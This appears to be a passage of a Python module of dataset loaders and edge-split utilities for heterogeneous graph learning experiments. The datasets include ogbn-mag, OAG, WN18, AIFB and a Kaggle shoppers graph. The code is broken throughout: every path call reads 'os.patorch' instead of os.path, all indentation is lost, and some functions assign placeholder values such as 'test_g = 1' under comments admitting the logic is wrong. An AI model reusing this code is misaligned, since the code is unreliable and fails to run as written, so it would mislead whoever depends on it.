hg.nodes['author'].data['emb'] = hg.nodes['author'].data['h'] / cnts
# Construct labels of paper nodes
ss, dd = hg.edges(etype=('field', 'rev_PF_in_L2', 'paper'))
ssu_, ssu = torch.unique(ss, return_inverse=True)
print('Full label set size:', len(ssu_))
paper_labels = torch.zeros(hg.num_nodes('paper'), len(ssu_), dtype=torch.bool)
paper_labels[dd, ssu] = True
# Split the dataset into training, validation and testing.
label_sum = paper_labels.sum(1)
times=hg.nodes['paper'].data['time']
pre_range = {t: True for t in times.numpy() if t != None and t < 2014}
train_range = {t: True for t in times.numpy() if t != None and t >= 2014 and t <= 2016}
valid_range = {t: True for t in times.numpy() if t != None and t > 2016 and t <= 2017}
test_range = {t: True for t in times.numpy() if t != None and t > 2017}
pre_target_nodes = []
train_target_nodes = []
valid_target_nodes = []
test_target_nodes = []
target_type = 'paper'
rel_stop_list = ['self', 'rev_PF_in_L0', 'rev_PF_in_L5', 'rev_PV_Repository', 'rev_PV_Patent']
for p_id, _time in enumerate(times):
if float(_time.numpy()) in pre_range:
pre_target_nodes += [[p_id, _time]]
elif float(_time.numpy()) in train_range:
train_target_nodes += [[p_id, _time]]
elif float(_time.numpy()) in valid_range:
valid_target_nodes += [[p_id, _time]]
elif float(_time.numpy()) in test_range:
test_target_nodes += [[p_id, _time]]
pre_target_nodes = np.array(pre_target_nodes)
train_target_nodes = np.array(train_target_nodes)
valid_target_nodes = np.array(valid_target_nodes)
test_target_nodes = np.array(test_target_nodes)
train_idx = torch.tensor(train_target_nodes[:, 0], dtype=int)
val_idx = torch.tensor(valid_target_nodes[:, 0], dtype=int)
test_idx = torch.tensor(test_target_nodes[:, 0], dtype=int)
# Remove infrequent labels. Otherwise, some of the labels will not have instances
# in the training, validation or test set.
num_filter=-1
label_filter = paper_labels[train_idx].sum(0) > num_filter
label_filter = torch.logical_and(label_filter, paper_labels[val_idx].sum(0) > num_filter)
label_filter = torch.logical_and(label_filter, paper_labels[test_idx].sum(0) > num_filter)
paper_labels = paper_labels[:,label_filter]
paper_labels=paper_labels.float()
print('#labels:', paper_labels.shape[1])
if args.klloss:
paper_labels /= paper_labels.sum(axis=1).reshape(-1, 1)
# Adjust training, validation and testing set to make sure all paper nodes
# in these sets have labels.
train_idx = train_idx[paper_labels[train_idx].sum(1) > 0]
val_idx = val_idx[paper_labels[val_idx].sum(1) > 0]
test_idx = test_idx[paper_labels[test_idx].sum(1) > 0]
# All labels have instances.
if num_filter>=0:
assert np.all(paper_labels[train_idx].sum(0).numpy() > 0)
assert np.all(paper_labels[val_idx].sum(0).numpy() > 0)
assert np.all(paper_labels[test_idx].sum(0).numpy() > 0)
# All instances have labels.
assert np.all(paper_labels[train_idx].sum(1).numpy() > 0)
assert np.all(paper_labels[val_idx].sum(1).numpy() > 0)
assert np.all(paper_labels[test_idx].sum(1).numpy() > 0)
# Remove field nodes from the graph.
etypes = []
for etype in hg.canonical_etypes:
if etype[0] != 'field' and etype[2] != 'field':
etypes.append(etype)
hg = dgl.edge_type_subgraph(hg, etypes)
print(hg.canonical_etypes)
# Construct node features.
# TODO(zhengda) we need to construct the node features for author nodes.
ntypes = []
if args.use_node_features:
node_feats = []
for ntype in hg.ntypes:
print(ntype)
if ntype != 'field' and 'emb' in hg.nodes[ntype].data:
feat = hg.nodes[ntype].data.pop('emb')
node_feats.append(feat.share_memory_())
ntypes.append(ntype)
else:
node_feats.append(None)
else:
node_feats = [None] * len(hg.ntypes)
print('nodes with features:', ntypes)
#print(node_feats)
category = 'paper'
return hg, node_feats, paper_labels, train_idx, val_idx, test_idx, category, paper_labels.shape[1]
def load_univ_homo_data(args):
ogb_dataset = False
oag_data = False
if args.dataset == 'aifb':
dataset = AIFBDataset()
elif args.dataset == 'mutag':
dataset = MUTAGDataset()
elif args.dataset == 'bgs':
dataset = BGSDataset()
elif args.dataset == 'am':
dataset = AMDataset()
elif args.dataset == 'oag_cs':
dataset = load_oag_nc_lp(args)
oag_data = True
elif args.dataset == 'ogbn-mag':
dataset = DglNodePropPredDataset(name=args.dataset)
ogb_dataset = True
else:
raise ValueError()
if ogb_dataset is True:
split_idx = dataset.get_idx_split()
train_idx = split_idx["train"]['paper']
val_idx = split_idx["valid"]['paper']
test_idx = split_idx["test"]['paper']
hg_orig, labels = dataset[0]
subgs = {}
for etype in hg_orig.canonical_etypes:
u, v = hg_orig.all_edges(etype=etype)
subgs[etype] = (u, v)
subgs[(etype[2], 'rev-' + etype[1], etype[0])] = (v, u)
hg = dgl.heterograph(subgs)
hg.nodes['paper'].data['feat'] = hg_orig.nodes['paper'].data['feat']
labels = labels['paper'].squeeze()
num_rels = len(hg.canonical_etypes)
num_of_ntype = len(hg.ntypes)
num_classes = dataset.num_classes
if args.dataset == 'ogbn-mag':
category = 'paper'
print('Number of relations: {}'.format(num_rels))
print('Number of class: {}'.format(num_classes))
print('Number of train: {}'.format(len(train_idx)))
print('Number of valid: {}'.format(len(val_idx)))
print('Number of test: {}'.format(len(test_idx)))
if args.use_node_features:
node_feats = []
for ntype in hg.ntypes:
if len(hg.nodes[ntype].data) == 0:
node_feats.append(None)
else:
assert len(hg.nodes[ntype].data) == 1
feat = hg.nodes[ntype].data.pop('feat')
node_feats.append(feat.share_memory_())
else:
node_feats = [None] * num_of_ntype
elif oag_data:
hg, node_feats, labels, train_idx, val_idx, test_idx, category, num_classes = dataset
num_rels = len(hg.canonical_etypes)
num_of_ntype = len(hg.ntypes)
else:
# Load from hetero-graph
hg = dataset[0]
num_rels = len(hg.canonical_etypes)
num_of_ntype = len(hg.ntypes)
category = dataset.predict_category
num_classes = dataset.num_classes
train_mask = hg.nodes[category].data.pop('train_mask')
test_mask = hg.nodes[category].data.pop('test_mask')
labels = hg.nodes[category].data.pop('labels')
train_idx = torch.nonzero(train_mask).squeeze()
test_idx = torch.nonzero(test_mask).squeeze()
node_feats = [None] * num_of_ntype
# AIFB, MUTAG, BGS and AM datasets do not provide validation set split.
# Split train set into train and validation if args.validation is set
# otherwise use train set as the validation set.
if args.validation:
val_idx = train_idx[:len(train_idx) // 5]
train_idx = train_idx[len(train_idx) // 5:]
else:
val_idx = train_idx
# calculate norm for each edge type and store in edge
if args.global_norm is False:
for canonical_etype in hg.canonical_etypes:
u, v, eid = hg.all_edges(form='all', etype=canonical_etype)
_, inverse_index, count = torch.unique(v, return_inverse=True, return_counts=True)
degrees = count[inverse_index]
norm = torch.ones(eid.shape[0]) / degrees
norm = norm.unsqueeze(1)
hg.edges[canonical_etype].data['norm'] = norm
# get target category id
category_id = len(hg.ntypes)
for i, ntype in enumerate(hg.ntypes):
if ntype == category:
category_id = i
g = dgl.to_homogeneous(hg, edata=['norm'])
if args.global_norm:
u, v, eid = g.all_edges(form='all')
_, inverse_index, count = torch.unique(v, return_inverse=True, return_counts=True)
degrees = count[inverse_index]
norm = torch.ones(eid.shape[0]) / degrees
norm = norm.unsqueeze(1)
g.edata['norm'] = norm
g.ndata[dgl.NTYPE].share_memory_()
g.edata[dgl.ETYPE].share_memory_()
g.edata['norm'].share_memory_()
node_ids = torch.arange(g.number_of_nodes())
# find out the target node ids
node_tids = g.ndata[dgl.NTYPE]
loc = (node_tids == category_id)
target_idx = node_ids[loc]
cluster_assignments=[]
if args.use_clusterandrecover_loss:
for feat in node_feats:
if feat is not None:
cluster_assignments.append(compute_cluster_assignemnts(feat, cluster_number=args.num_cluster))
else:
cluster_assignments.append(None)
#target_idx.share_memory_()
#train_idx.share_memory_()
#val_idx.share_memory_()
#test_idx.share_memory_()
# Create csr/coo/csc formats before launching training processes with multi-gpu.
# This avoids creating certain formats in each sub-process, which saves momory and CPU.
g.create_formats_()
metapaths={}
train_edges=[]
test_edges=[]
valid_edges=[]
test_edges=[]
train_g=g
valid_g=g
test_g=g
multilabel=False
if oag_data:
multilabel=True
return train_idx,val_idx,test_idx,target_idx,labels,num_classes,node_feats,cluster_assignments,\
metapaths, train_edges, test_edges, valid_edges, train_g, valid_g, test_g,multilabel,num_rels
def load_kge_hetero_data(args):
if args.dataset == "imdb_preprocessed":
load_imdb_kge_preprocessed_data(args)
elif args.dataset == "dblp_preprocessed":
load_dblp_kge_preprocessed_data(args)
elif args.dataset == "oag":
load_oag_kge_preprocessed_data(args)
elif args.dataset == "oag_na":
load_oag_na_kge_preprocessed_data(args)
else:
raise NotImplementedError
return
def load_hetero_link_pred_data(args):
if args.dataset == "wn18":
train_edges, test_edges, valid_edges, train_g, valid_g, test_g, featless_node_types = load_link_pred_wn_pick_data(
args)
elif args.dataset == "query_biodata":
train_edges, test_edges, valid_edges, train_g, valid_g, test_g, featless_node_types = load_link_pred_query_biodata_data(
args)
else:
raise NotImplementedError
return train_edges, test_edges, valid_edges, train_g, valid_g, test_g, featless_node_types
def load_link_pred_query_biodata_data(args):
def triplets_to_dict(edges,etype_to_canonical):
d_e={}
s,e,d=edges
for sou,edg,dest in zip(s,e,d):
edg =str(edg)
edg=etype_to_canonical[edg]
if edg not in d_e:
d_e[edg]=[(sou,dest)]
else:
d_e[edg]+=[(sou,dest)]
return d_e
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/query_biodata/"
# In[13]:
g = pickle.load(open(os.patorch.join(data_folder, 'graph.pickle'), "rb")).to(torch.device("cpu"))
#get eid from heterograph and use dgl.edge_subgraph
train_pct = 0.8
val_pct= 0.1
#train_g,valid_g,test_g,train_edges,valid_edges,test_edges=create_edge_graph_splits(g,train_pct,val_pct,data_folder)
splits_dir=pickle.load(open(os.patorch.join(data_folder, 'splits_dir.pickle'), "rb"))
#TODO fix this is wrong had to add all edges in the testign graph
#
train_g=1#splits_dir['train_g']
valid_g=splits_dir['valid_g']
test_g=splits_dir['test_g']
train_edges=splits_dir['train_edges']
valid_edges=splits_dir['valid_edges']
test_edges=splits_dir['test_edges']
featless_node_types=[]
return train_edges, test_edges, valid_edges, train_g,valid_g,test_g, featless_node_types
def create_edge_few_shot_splits(g,directory,etype,K=10,val_pct=0.01):
if os.patorch.exists(os.patorch.join(directory, "few_shot_splits_dir"+str(K)+".pickle")):
splits_dir = pickle.load(open(os.patorch.join(directory, "few_shot_splits_dir"+str(K)+".pickle"), "rb"))
train_g = splits_dir['train_g']
valid_g = splits_dir['valid_g']
test_g = splits_dir['test_g']
train_edges = splits_dir['train_edges']
valid_edges = splits_dir['valid_edges']
test_edges = splits_dir['test_edges']
else:
num_nodes_per_types = {}
for ntype in g.ntypes:
num_nodes_per_types[ntype] = g.number_of_nodes(ntype)
train_edges = {}
valid_edges = {}
test_edges = {}
valid_edgesfgraph = {}
test_edgesfgraph = {}
for c_etype in g.canonical_etypes:
etyp_eids = g.all_edges(form='uv', etype=c_etype)
n_edges = etyp_eids[0].size(0)
perm = torch.randperm(n_edges)
if c_etype[1] not in etype:
train_id = perm#[:int(n_edges * train_pct)]
val_id = []#perm[int(n_edges * train_pct):int(n_edges * (train_pct + val_pct))]
val_id_fgraph = perm#[:int(n_edges * (train_pct + val_pct))]
test_id = []#perm[int(n_edges * (train_pct + val_pct)):]
test_id_fgraph = perm
else:
train_id = perm[:K]
val_id = perm[K:K + int(val_pct * len(etyp_eids[0]))]
val_id_fgraph = perm[:K + int(val_pct * len(etyp_eids[0]))]
test_id = perm[K + int(val_pct * len(etyp_eids[0])):]
test_id_fgraph = perm
edges = list(tuple(zip(etyp_eids[0].cpu().numpy(), etyp_eids[1].cpu().numpy())))
train_edges[c_etype] = [edges[i] for i in train_id.numpy().astype(int)]
if len(val_id)>0:
valid_edges[c_etype] = [edges[i] for i in val_id.numpy().astype(int)]
valid_edgesfgraph[c_etype] = [edges[i] for i in val_id_fgraph.numpy().astype(int)]
if len(test_id) > 0:
test_edges[c_etype] = [edges[i] for i in test_id.numpy().astype(int)]
test_edgesfgraph[c_etype] = [edges[i] for i in test_id_fgraph.numpy().astype(int)]
train_g = dgl.heterograph(train_edges, num_nodes_per_types)
valid_g = dgl.heterograph(valid_edgesfgraph, num_nodes_per_types)
test_g = dgl.heterograph(test_edgesfgraph, num_nodes_per_types)
for e in train_edges.keys():
train_edges[e] = torch.tensor(train_edges[e]).long().transpose(1, 0)
for e in valid_edges.keys():
valid_edges[e] = torch.tensor(valid_edges[e]).long().transpose(1, 0)
for e in test_edges.keys():
test_edges[e] = torch.tensor(test_edges[e]).long().transpose(1, 0)
for ntype in g.ntypes:
if g.nodes[ntype].data.get("h_f", None) is not None:
train_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['h_f']
valid_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['h_f']
test_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['h_f']
splits_dir={"train_g":train_g,"valid_g":valid_g,"test_g":test_g,"train_edges":train_edges,
"valid_edges":valid_edges,"test_edges":test_edges,}
pickle.dump(splits_dir, open(os.patorch.join(directory, "few_shot_splits_dir"+str(K)+".pickle"), "wb"),
protocol=4);
return train_g,valid_g,test_g,train_edges,valid_edges,test_edges
def create_edge_graph_splits_kge(g,train_pct,val_pct,directory):
if not os.patorch.exists(directory + "splits_dir_tr" + str(train_pct) + "_val_" + str(val_pct) + ".pickle"):
num_nodes_per_types = {}
for ntype in g.ntypes:
num_nodes_per_types[ntype] = g.number_of_nodes(ntype)
train_edges = {}
valid_edges = {}
test_edges = {}
valid_edgesfgraph = {}
test_edgesfgraph = {}
for c_etype in g.canonical_etypes:
etyp_eids = g.all_edges(form='uv', etype=c_etype)
n_edges = etyp_eids[0].size(0)
perm = torch.randperm(n_edges)
train_id = perm[:int(n_edges * train_pct)]
val_id = perm[int(n_edges * train_pct):int(n_edges * (train_pct + val_pct))]
val_id_fgraph = perm[:int(n_edges * (train_pct + val_pct))]
test_id = perm[int(n_edges * (train_pct + val_pct)):]
test_id_fgraph = perm
edges = list(tuple(zip(etyp_eids[0].cpu().numpy(), etyp_eids[1].cpu().numpy())))
train_edges[c_etype] = [edges[i] for i in train_id.numpy().astype(int)]
valid_edges[c_etype] = [edges[i] for i in val_id.numpy().astype(int)]
test_edges[c_etype] = [edges[i] for i in test_id.numpy().astype(int)]
def totriple(edges):
triples = []
for e in edges.keys():
triples += [(uv[0], e, uv[1]) for uv in edges[e]]
return triples
train_triples=totriple(train_edges)
valid_triples = totriple(valid_edges)
test_triples = totriple(test_edges)
with open(directory+'train'+str(round(0.975- train_pct,2))+'.txt', 'w') as f:
for item in train_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
with open(directory+'valid'+str(round(0.975- train_pct,2))+'.txt', 'w') as f:
for item in valid_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
with open(directory+'test'+str(round(0.975- train_pct,2))+'.txt', 'w') as f:
for item in test_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
else:
splits_dir = pickle.load(open(os.patorch.join(directory,
"splits_dir_tr"+str(train_pct)+"_val_"+str(val_pct)+".pickle"), "rb"))
train_g = splits_dir['train_g']
valid_g = splits_dir['valid_g']
test_g = splits_dir['test_g']
train_edges = splits_dir['train_edges']
valid_edges = splits_dir['valid_edges']
test_edges = splits_dir['test_edges']
def totriple(edges):
triples = []
for e in edges.keys():
triples += [(uv[0], e[1], uv[1]) for uv in list(map(list, zip(*edges[e].tolist())))]
return triples
train_triples=totriple(train_edges)
valid_triples = totriple(valid_edges)
test_triples = totriple(test_edges)
with open(directory+'train'+str(round(0.975- train_pct,2))+'.txt', 'w') as f:
for item in train_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
with open(directory+'valid'+str(round(0.975- train_pct,2))+'.txt', 'w') as f:
for item in valid_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
with open(directory+'test'+str(round(0.975- train_pct,2))+'.txt', 'w') as f:
for item in test_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
return
def create_edge_graph_few_shot_splits_kge(g,directory,etype,K,val_pct=0.005) :
if not os.patorch.exists(directory+'train'+str(K)+'.txt'):
num_nodes_per_types = {}
for ntype in g.ntypes:
num_nodes_per_types[ntype] = g.number_of_nodes(ntype)
train_edges = {}
valid_edges = {}
test_edges = {}
valid_edgesfgraph = {}
test_edgesfgraph = {}
for c_etype in g.canonical_etypes:
etyp_eids = g.all_edges(form='uv', etype=c_etype)
n_edges = etyp_eids[0].size(0)
perm = torch.randperm(n_edges)
if c_etype[1] not in etype:
train_id = perm#[:int(n_edges * train_pct)]
val_id = []#perm[int(n_edges * train_pct):int(n_edges * (train_pct + val_pct))]
test_id = []#perm[int(n_edges * (train_pct + val_pct)):]
else:
train_id = perm[:K]
val_id = perm[K:K + int(val_pct * len(etyp_eids[0]))]
test_id = perm[K + int(val_pct * len(etyp_eids[0])):]
edges = list(tuple(zip(etyp_eids[0].cpu().numpy(), etyp_eids[1].cpu().numpy())))
train_edges[c_etype] = [edges[i] for i in train_id.numpy().astype(int)]
if len(val_id)>0:
valid_edges[c_etype] = [edges[i] for i in val_id.numpy().astype(int)]
if len(test_id) > 0:
test_edges[c_etype] = [edges[i] for i in test_id.numpy().astype(int)]
def totriple(edges):
triples=[]
for e in edges.keys():
triples+=[(uv[0],e,uv[1]) for uv in edges[e]]
return triples
train_triples=totriple(train_edges)
valid_triples = totriple(valid_edges)
test_triples = totriple(test_edges)
with open(directory+'train'+str(K)+'.txt', 'w') as f:
for item in train_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
with open(directory+'valid'+str(K)+'.txt', 'w') as f:
for item in valid_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
with open(directory+'test'+str(K)+'.txt', 'w') as f:
for item in test_triples:
f.writelines("{}\t{}\t{}\n".format(item[0], item[1], item[2]))
return
def create_edge_graph_splits(g, train_pct, val_pct, directory):
if train_pct==1 and os.patorch.exists(directory+ "complete_splits_dir.pickle"):
splits_dir = pickle.load(open(os.patorch.join(directory,"complete_splits_dir.pickle"), "rb"))
train_g = splits_dir['train_g']
valid_g = splits_dir['valid_g']
test_g = splits_dir['test_g']
train_edges = splits_dir['train_edges']
valid_edges = splits_dir['valid_edges']
test_edges = splits_dir['test_edges']
return train_g, valid_g, test_g, train_edges, valid_edges, test_edges
elif not os.patorch.exists(directory+"splits_dir_tr"+str(train_pct)+"_val_"+str(val_pct)+".pickle"):
num_nodes_per_types = {}
for ntype in g.ntypes:
num_nodes_per_types[ntype] = g.number_of_nodes(ntype)
train_edges = {}
valid_edges = {}
test_edges = {}
valid_edgesfgraph = {}
test_edgesfgraph = {}
for c_etype in g.canonical_etypes:
etyp_eids = g.all_edges(form='uv', etype=c_etype)
n_edges = etyp_eids[0].size(0)
perm = torch.randperm(n_edges)
train_id = perm[:int(n_edges * train_pct)]
val_id = perm[int(n_edges * train_pct):int(n_edges * (train_pct + val_pct))]
val_id_fgraph = perm[:int(n_edges * (train_pct + val_pct))]
test_id = perm[int(n_edges * (train_pct + val_pct)):]
test_id_fgraph = perm
edges = list(tuple(zip(etyp_eids[0].cpu().numpy(), etyp_eids[1].cpu().numpy())))
train_edges[c_etype] = [edges[i] for i in train_id.numpy().astype(int)]
valid_edges[c_etype] = [edges[i] for i in val_id.numpy().astype(int)]
valid_edgesfgraph[c_etype] = [edges[i] for i in val_id_fgraph.numpy().astype(int)]
test_edges[c_etype] = [edges[i] for i in test_id.numpy().astype(int)]
test_edgesfgraph[c_etype] = [edges[i] for i in test_id_fgraph.numpy().astype(int)]
train_g = dgl.heterograph(train_edges, num_nodes_per_types)
valid_g = dgl.heterograph(valid_edgesfgraph, num_nodes_per_types)
test_g = dgl.heterograph(test_edgesfgraph, num_nodes_per_types)
for e in train_edges.keys():
train_edges[e] = torch.tensor(train_edges[e]).long().transpose(1, 0)
if train_pct != 1:
for e in valid_edges.keys():
valid_edges[e] = torch.tensor(valid_edges[e]).long().transpose(1, 0)
for e in test_edges.keys():
test_edges[e] = torch.tensor(test_edges[e]).long().transpose(1, 0)
for ntype in g.ntypes:
if g.nodes[ntype].data.get("h_f", None) is not None:
train_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['h_f']
valid_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['h_f']
test_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['h_f']
splits_dir = {"train_g": train_g, "valid_g": valid_g, "test_g": test_g, "train_edges": train_edges,
"valid_edges": valid_edges, "test_edges": test_edges, }
if train_pct==1:
splits_dir = {"train_g": g, "valid_g": g, "test_g": g, "train_edges": train_edges,
"valid_edges": valid_edges, "test_edges": test_edges, }
pickle.dump(splits_dir, open(os.patorch.join(directory, "complete_splits_dir.pickle"), "wb"),
protocol=4);
else:
pickle.dump(splits_dir, open(os.patorch.join(directory, "splits_dir_tr"+str(train_pct)+"_val_"+str(val_pct)+".pickle"), "wb"),
protocol=4);
else:
splits_dir = pickle.load(open(os.patorch.join(directory,
"splits_dir_tr"+str(train_pct)+"_val_"+str(val_pct)+".pickle"), "rb"))
train_g = splits_dir['train_g']
valid_g = splits_dir['valid_g']
test_g = splits_dir['test_g']
train_edges = splits_dir['train_edges']
valid_edges = splits_dir['valid_edges']
test_edges = splits_dir['test_edges']
return train_g, valid_g, test_g, train_edges, valid_edges, test_edges
def keep_frequent_motifs(g):
# keeps columns where the number of nonzero is more than 10% of the nodes
for ntype in g.ntypes:
num_motifs = g.nodes[ntype].data['motifs'].shape[1]
num_nodes = g.nodes[ntype].data['motifs'].shape[0]
to_keep_inds = []
for i in range(num_motifs):
nnz = len(torch.nonzero(g.nodes[ntype].data['motifs'][:, i]))
if nnz > num_nodes / 10:
to_keep_inds += [i]
print('Motifs to keep')
print(to_keep_inds)
g.nodes[ntype].data['motifs'] = g.nodes[ntype].data['motifs'][:, to_keep_inds]
return g
def motif_distribution_to_clusters(g,cluster_number):
for ntype in g.ntypes:
g.nodes[ntype].data['motifs']=compute_cluster_assignemnts(g.nodes[ntype].data['motifs'], cluster_number)
return g
def motif_distribution_to_zero_one(g,args):
if args.motif_clusters>0:
g=motif_distribution_to_clusters(g, args.motif_clusters)
else:
g=motif_distribution_to_high_low_one(g)
return g
def motif_distribution_to_high_low_one(g):
# convert the motif distribution to high (1) and low (0) values
med=False
mean=True
for ntype in g.ntypes:
num_motifs = g.nodes[ntype].data['motifs'].shape[1]
for i in range(num_motifs):
if med==True:
med = median(g.nodes[ntype].data['motifs'][:, i])
elif mean:
med = torch.mean(g.nodes[ntype].data['motifs'][:, i])
else:
med=0
g.nodes[ntype].data['motifs'][:, i]=(g.nodes[ntype].data['motifs'][:, i]>med).float()
print('Median motif value')
print(med)
# TODO possibly filter out again the frequent nonzero columns
# g=keep_frequent_motifs(g)
return g
def load_link_pred_wn_pick_data(args):
data_folder = "../data/kg/wn18/"
# In[13]:
data = pickle.load(open(os.patorch.join(data_folder, 'data_lp_motifs.pickle'), "rb"))
train_edges=data["train_edges"]
test_edges=data["test_edges"]
valid_edges=data["valid_edges"]
train_g=data["train_g"]
valid_g = data["valid_g"]
test_g=data["test_g"]
featless_node_types=data["featless_node_types"]
src_id=data["src_id"]
dest_id=data["dest_id"]
edata=data["edata"]
if args.use_node_motifs:
for ntype in train_g.ntypes:
train_g.nodes[ntype].data['motifs'] = train_g.nodes[ntype].data['motifs'].float()
train_g=keep_frequent_motifs(train_g)
train_g=motif_distribution_to_zero_one(train_g,args)
else:
for ntype in train_g.ntypes:
del train_g.nodes[ntype].data['motifs']
return train_edges, test_edges, valid_edges, train_g,valid_g,test_g, featless_node_types
def load_link_pred_wn_data(args):
def triplets_to_dict(edges,etype_to_canonical):
d_e={}
s,e,d=edges
for sou,edg,dest in zip(s,e,d):
edg =str(edg)
edg=etype_to_canonical[edg]
if edg not in d_e:
d_e[edg]=[(sou,dest)]
else:
d_e[edg]+=[(sou,dest)]
return d_e
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../../data/kg/wn18/"
# In[13]:
g = pickle.load(open(os.patorch.join(data_folder, 'graph_reduced.pickle'), "rb")).to(torch.device("cpu"))
link_pred_splits=pickle.load(open(os.patorch.join(data_folder, 'link_pred_splits.pickle'), "rb"))#.to(torch.device("cpu"))
num_nodes_per_types={}
for ntype in g.ntypes:
num_nodes_per_types[ntype]=g.number_of_nodes(ntype)
# In[14]:
etype_to_canonical={}
for i, etype in enumerate(g.etypes):
etype_to_canonical[etype]=g.canonical_etypes[i]
train_edges=triplets_to_dict(link_pred_splits['tr'],etype_to_canonical)
test_edges = triplets_to_dict(link_pred_splits['test'],etype_to_canonical)
valid_edges =triplets_to_dict( link_pred_splits['val'],etype_to_canonical)
train_g=dgl.heterograph(train_edges,num_nodes_per_types)
valid_g = dgl.heterograph(valid_edges, num_nodes_per_types)
# TODO THIS IS WRONG!!! I have to add the train valid and test
test_g = 1 #dgl.heterograph(test_edges, num_nodes_per_types)
# remove last feature
g.nodes[ntype].data['features']=g.nodes[ntype].data['features'][:,:-1]
use_feats=True
if use_feats:
for ntype in g.ntypes:
if g.nodes[ntype].data.get("features", None) is not None:
train_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['features']
valid_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['features']
test_g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['features']
# Create the train, valid, test graphs
for e in train_edges.keys():
train_edges[e]=torch.tensor(train_edges[e]).long().transpose(1,0)
for e in valid_edges.keys():
valid_edges[e]=torch.tensor(valid_edges[e]).long().transpose(1,0)
for e in test_edges.keys():
test_edges[e]=torch.tensor(test_edges[e]).long().transpose(1,0)
featless_node_types=[]
return train_edges, test_edges, valid_edges, train_g,valid_g,test_g, featless_node_types
def load_wn_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/kg/wn18/"
# In[13]:
# graph file has 81 different node types based on the type of word (but it is unclear what it corresponds to)
# graph_reduced has the 4 basic node types.
g = pickle.load(open(os.patorch.join(data_folder, 'graph_reduced.pickle'), "rb")).to(torch.device("cpu"))
# In[14]:
labels = g.nodes['word'].data['features'][:, -1].cpu()
g.nodes['word'].data['features']=g.nodes['word'].data['features'][:,: -1]
label_indices = [i for i in range(len(labels))];
train_idx, test_idx, y_train, y_test = train_test_split(label_indices, labels, test_size=0.2, random_state=seed)
#sss = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=seed);
#train_idx, test_idx = next(sss.split(label_indices, labels));
val_idx, test_idx, y_train, y_test = train_test_split(list(test_idx), np.array(labels)[test_idx], test_size=0.5, random_state=seed)
#sss = StratifiedShuffleSplit(n_splits=1, test_size=0.5, random_state=seed);
#valid_index_temp, test_index_temp = next(sss.split(list(test_idx), np.array(labels)[test_idx]));
#val_idx = np.array(test_idx)[valid_index_temp];
#test_idx = np.array(test_idx)[test_index_temp];
train_idx = np.array(train_idx);
test_idx = np.array(test_idx);
val_idx = np.array(val_idx);
category='word'
num_classes=4
for ntype in g.ntypes:
if g.nodes[ntype].data.get("features", None) is not None:
g.nodes[ntype].data['h_f'] = g.nodes[ntype].data['features']
featless_node_types = []
if num_classes>1:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i,int(labels[i])]=1
else:
labels_n=labels
labels=labels_n
if args.use_clusterandrecover_loss:
for ntype in g.ntypes:
if g.nodes[ntype].data.get("h_f", None) is not None:
g.nodes[ntype].data['h_clusters']=compute_cluster_assignemnts(g.nodes[ntype].data['h_f'],cluster_number=args.num_clusters)
return train_idx,test_idx,val_idx,labels,g,category,num_classes,featless_node_types
def load_kaggle_shoppers_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/kaggle_shoppers/"
# In[13]:r
G = pickle.load(open(os.patorch.join(data_folder, 'graph_0.001.pickle'), "rb")).to(torch.device("cpu"))
# In[14]:
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
# In[15]:
print(G)
# In[16]:
# G.nodes['application'].data['features'].fill_(0.0);
# In[17]:
print(labels)
# In[18]:
label_indices = [i for i in range(len(labels))];
sss = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=seed);
train_idx, test_idx = next(sss.split(label_indices, labels));
